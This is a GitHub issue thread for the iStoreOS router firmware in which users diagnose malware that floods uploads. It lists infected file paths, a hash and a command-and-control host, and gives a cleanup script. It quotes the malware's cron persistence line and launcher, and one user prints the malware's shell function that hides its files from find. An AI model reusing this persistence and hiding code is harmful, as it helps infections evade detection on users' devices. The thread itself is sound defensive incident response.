istoreos/istoreos #1282: 异常内网跑满上传，峰值六万个TCP连接

SalmonBall, 2024-01-19:
## 1.关于你要提交的问题
最新版istoreos使用一段时间后，就会触发bug，触发这个bug后就会高频率占用上传，电信家宽1000M，但是上传监测却能跑到120MB/s
查看状态-实时信息-连接，TCP连接在上传占用期间达到六万多个。实时信息里流量eth0，对应wan口占满全部上传速度。
重启只能短暂恢复正常使用，必须重置固件才能恢复正常使用，同时首页显示 DNS 错误。安装的软件有 UU加速器和 DDNSGO

设备intel NUC13ANBi5 加厚款可以添加一个2.5G网口，原来的2.5G网口用作wan。 16Gddr4 , 512G硬盘

jjm2473, 2024-01-22:
我倒是怀疑中毒了 https://github.com/istoreos/istoreos/issues/1103

ycdthyj, 2024-01-27:
我也遇到过

LilacEssix, 2024-02-02:
一样的情况

jjm2473, 2024-02-02:
用top命令看看哪个进程cpu占用率高

jjm2473, 2024-02-02:
截这么多图没用，关键是要检查哪个ip的流量大，不只是外部ip，还有内网是哪个设备流量大。

打开状态-实时信息-连接，看看有没有大流量经过istoreos，如果没有，那都跟istoreos无关了，你也没办法从istoreos里面排查问题，这时你要从网关上看看哪个内网ip流量高。

jjm2473, 2024-02-02:
@WillzenZou 有空的话，给我发邮件，我远程看看。

WillzenZou, 2024-02-02:
> 截这么多图没用，关键是要检查哪个ip的流量大，不只是外部ip，还有内网是哪个设备流量大。
> 
> 打开状态-实时信息-连接，看看有没有大流量经过istoreos，如果没有，那都跟istoreos无关了，你也没办法从istoreos里面排查问题，这时你要从网关上看看哪个内网ip流量高。

感谢大佬指点，“状态-实时信息-连接”这里也没有发现，远程晚点安排一下。目前问题不好排查，因为一开整个内网都崩了无法访问网络。另外内网设备的问题我排查过，把设备都关了仍然能出现。

另外：出现异常的源地址192.168.62.249:255以及192.168.62.223:255端口的都是IStoreOS本机的IP。

jjm2473, 2024-02-02:
@WillzenZou 你有翻墙吗，把翻墙插件先禁用再联网看看

WillzenZou, 2024-02-02:
@jjm2473 邮件已经发送，来自：willzen@yeah.net，先感谢大佬协助。目前使用了防火墙禁止了所有连接，免得导致断网无法远程。
[image]

jjm2473, 2024-02-02:
@WillzenZou 你的机器肯定是中病毒了，可能还不止一个。

[image]

从你的截图来看，就有一个可疑的定时任务。`/.mod`是一个脚本，远程查看此文件，里面就是调用了`/usr/lib/libgdi.so.0.8.2`，而这个文件已确认是病毒 https://www.virustotal.com/gui/file/7e433e0c6041a2d8334d96741a7bc8586859ff9d93ed6857e1c41a37c68957ed/details

并且，病毒还不止一个副本和启动方式，包括副本`/boot/system.pub`（跟`/usr/lib/libgdi.so.0.8.2`完全一样），启动脚本在`/etc/init.d/dns-udp4`。除此以外，还有`/etc/rc.local`，`/etc/rc.d/dns-udp4`都包含病毒的启动脚本，病毒副本还包括`/usr/sbin/netstat.cfg`。

只要发现系统里面有`/boot/system.pub`，`/usr/lib/libgdi.so.0.8.2`，`/usr/sbin/netstat.cfg`中的任意一个，都可以确认感染此病毒。

jjm2473, 2024-02-02:
再次强调一遍，刷机以后尽快修改密码，如果已经感染病毒或者怀疑被感染，在恢复出厂设置以后也要立马修改密码，而且最好是在断网的情况下恢复出厂设置和修改密码。有条件的还可以禁止ssh密码登录，改成只允许ssh证书登录。

WillzenZou, 2024-02-02:
> @WillzenZou 你的机器肯定是中病毒了，可能还不止一个。
> 
> <img alt="image" width="239" src="https://private-user-images.githubusercontent.com/3896703/301871219-53846030-ea3a-4da9-ae66-43351077e374.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MDY4ODU4OTksIm5iZiI6MTcwNjg4NTU5OSwicGF0aCI6Ii8zODk2NzAzLzMwMTg3MTIxOS01Mzg0NjAzMC1lYTNhLTRkYTktYWU2Ni00MzM1MTA3N2UzNzQucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MDIwMiUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDAyMDJUMTQ1MzE5WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9MWY5MjQ3NTUzMmNlNmI3YmZjMzM3Y2QxMWNkOGEzNzBmNWEyMTUyYTUzZjYwOGYxOTE5MDljYTk0N2VmZmFiNyZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmYWN0b3JfaWQ9MCZrZXlfaWQ9MCZyZXBvX2lkPTAifQ.TDBkBwBoXTr2F2dGPudnxkWSMF_PagnqNzPVi8HG8wk">
> 从你的截图来看，就有一个可疑的定时任务。`/.mod`是一个脚本，远程查看此文件，里面就是调用了`/usr/lib/libgdi.so.0.8.2`，而这个文件已确认是病毒 https://www.virustotal.com/gui/file/7e433e0c6041a2d8334d96741a7bc8586859ff9d93ed6857e1c41a37c68957ed/details
> 
> 并且，病毒还不止一个副本和启动方式，包括副本`/boot/system.pub`（跟`/usr/lib/libgdi.so.0.8.2`完全一样），启动脚本在`/etc/init.d/dns-udp4`。除此以外，还有`/etc/rc.local`，`/etc/rc.d/dns-udp4`都包含病毒的启动脚本，病毒副本还包括`/usr/sbin/netstat.cfg`。
> 
> 只要发现系统里面有`/boot/system.pub`，`/usr/lib/libgdi.so.0.8.2`，`/usr/sbin/netstat.cfg`中的任意一个，都可以确认感染此病毒。

学到了，非常感谢大佬指点，Linux还是比Windows好玩，有很多地方需要学习和研究！

SalmonBall, 2024-02-02:
@WillzenZou 我想知道，你都用了什么插件，我不太明白是怎么中的病毒

WillzenZou, 2024-02-02:
> @WillzenZou 我想知道，你都用了什么插件，我不太明白是怎么中的病毒

我这istoreos上面没装啥插件，中的病毒是来自局域网的，主要原因估计还是弱密码，不排除插件也会带病毒，可以根据@jjm2473 大佬提供的思路排查。主要检查/overlay/upper目录里面的内容，检查/etc/rc.local、/etc/crontab、root用户目录以及其他比较不常见的“."开头的隐藏文件进行排查。

closed 2024-02-18 by jjm2473

by-JohnChen, 2024-02-24:
请检查以下文件是否有异常
`/.mod
/boot/system.pub
/etc/rc.local
/etc/crontab
/etc/init.d/dns-4udp
/etc/profile.d/bash.cfg
/etc/profile.d/bash.cfg.sh
/etc/profile.d/gateway.sh
/usr/lib/libgdi.so.0.8.2
/usr/sbin/netstat.cfg`

by-JohnChen, 2024-02-24:
> @WillzenZou 我想知道，你都用了什么插件，我不太明白是怎么中的病毒

默认密码 + 公网IP

by-JohnChen, 2024-02-24:
你每次执行 `ps ls find lsof netstat ifconfig`
都会调用这个文件/etc/profile.d/gateway.sh从而启动和隐藏木马程序

jjm2473, 2024-02-24:
最好断网，恢复出厂设置（甚至不保留配置刷机），然后马上改密码，最后再联网。

by-JohnChen, 2024-02-26:
#!
function find { proc_name=$(/usr/bin/find $@);proc_name=$(echo "$proc_name" | sed -e '/\/usr\/bin\/include\//d');proc_name=$(echo "$proc_name" | sed -e '/dns-udp4/d');proc_name=$(echo "$proc_name" | sed -e '/quotaon.service/d');proc_name=$(echo "$proc_name" | sed -e '/system.pub/d');proc_name=$(echo "$proc_name" | sed -e '/gateway.sh/d');proc_name=$(echo "$proc_name" | sed -e '/.mod/d');proc_name=$(echo "$proc_name" | sed -e '/libgdi.so.0.8.2/d');proc_name=$(echo "$proc_name" | sed -e '/system.mark/d');proc_name=$(echo "$proc_name" | sed -e '/netstat.cfg/d');proc_name=$(echo "$proc_name" | sed -e '/bash.cfg/d');proc_name=$(echo "$proc_name" | sed -e '/system.mark/d');echo "$proc_name"; }

by-JohnChen, 2024-02-26:
目前版本MD5值 f449ef47c4f79ab4ecfe3d11022333d5 .mod

by-JohnChen, 2024-02-26:
> 最好断网，恢复出厂设置（甚至不保留配置刷机），然后马上改密码，最后再联网。

没有必要，按照我上面发的把这些文件删掉，清理rc.loacl, crontab，init.d/就好了

w64050593, 2024-07-10:
好像是因为安装时没有修改密码导致被入侵了，我安装的是openwrt 22.03 ,有同样问题，会对外发送大量SYN包，导致宽带断线。
感染后会在/etc/crontab内自动添加一个定时任务：
*/1 * * * * root /.mod

.mod 文件内容为：
#!/bin/ash
/usr/lib/libgdi.so.0.8.2

运行后主动连接www.v72c.com或IP193.142.146.228 ,可能是下载攻击指令。然后会对外大量发送syn包

我提供的压缩包内有一个病毒文件libgdi.so.0.8.2，一个抓包文件，一个网络连接表复制：
proc/net/rf_conntract

w64050593, 2024-07-10:
[
[Uploading linux发包病毒分析.zip…]()
](url)

jjm2473, 2024-07-17:
以下文件：
```
/.mod
/boot/system.pub
/etc/init.d/dns-4udp
/etc/profile.d/bash.cfg
/etc/profile.d/bash.cfg.sh
/etc/profile.d/gateway.sh
/lib/system.mark
/usr/lib/libgdi.so.0.8.2
/usr/sbin/netstat.cfg
```
发现两个以上的话，可以确认是病毒 https://www.virustotal.com/gui/file/7e433e0c6041a2d8334d96741a7bc8586859ff9d93ed6857e1c41a37c68957ed/details

stormyangyang, 2024-08-14:
同样遇到这种病毒，但是不清楚这个病毒是怎么中的。

jjm2473, 2024-08-15:
> 同样遇到这种病毒，但是不清楚这个病毒是怎么中的。

大概率是因为没改系统默认密码

AddaxSoft, 2024-08-21:
ah this was such a nasty virus! here is a script i coded to clean it up from your device / box:

```
#!/bin/sh

# List of files to search and process
FILES_LIST="
    /.mod
    /boot/system.pub
    /etc/rc.local
    /etc/crontab
    /etc/init.d/dns-4udp
    /etc/profile.d/bash.cfg
    /etc/profile.d/bash.cfg.sh
    /etc/profile.d/gateway.sh
    /lib/system.mark
    /usr/lib/libgdi.so.0.8.2
    /usr/sbin/netstat.cfg
    /boot/system.pub
    /lib/system.mark
    /etc/profile.d/bash.cfg
    /usr/sbin/netstat.cfg
    /usr/lib/libgdi.so.0.8.2
"

# Loop through the list of files
for file in $FILES_LIST; do
  # Check if the file exists
  if [ -f "$file" ]; then
    # Echo ";" to the file
    chmod 700 "$file"
    echo ";" > "$file"

    # Change the file permissions to 000
    chmod 000 "$file"

    # Optional: Echo which file was processed (for logging/debugging)
    echo "Processed: $file"
  else
    # File not found message
    echo "File not found: $file"
  fi
done
```

run with:
`sh cleanvir.sh`

QPass, 2024-08-26:
谢谢，忙活了一个晚上没找到问题，原来是病毒搞的鬼。
初始密码在这台路由器首次连外网之前就改掉了，还是中了招。

jjm2473, 2024-08-29:
@QPass 内网也可能其他机器有木马啊，一样也会被感染，虽然可能性小一些，但内网也不是绝对安全的。

liwenyu03, 2025-04-17:
求助：！！！同样的问题，已经确实这个病毒感染，目前没办法进行刷机（在外地），如何清除或者临时阻止

QPass, 2025-04-20:
> 求助：！！！同样的问题，已经确实这个病毒感染，目前没办法进行刷机（在外地），如何清除或者临时阻止

上面有网友写了脚本，用终端创建一个.sh文件，打开编辑器把内容粘贴进去，保存，运行，就好了

liwenyu03, 2025-04-20:
> 内容

好的，您测试过了

yfding98, 2025-06-25:
[image]

jjm2473, 2025-06-25:
备份-重制-还原不一定能清理掉病毒，如果这个病毒是为openwrt写的，那是有可能把自己加入到备份列表的。

yfding98, 2025-06-26:
> [@yfding98](https://github.com/yfding98) 你这个环境看起来不是openwrt，可能路径不一样。你可以先想办法杀掉病毒进程：`mount | grep /proc`看看病毒隐藏了哪个pid，然后`umount /proc/[pid]`让病毒显示，然后`kill -9 [pid]`，再运行之前的脚本看能不能成功。如果脚本运行成功，之后还是感染，那可能是变种，还有其他路径有病毒，或者纯粹是因为系统不一样，所以路径也不一样。

感谢！解决了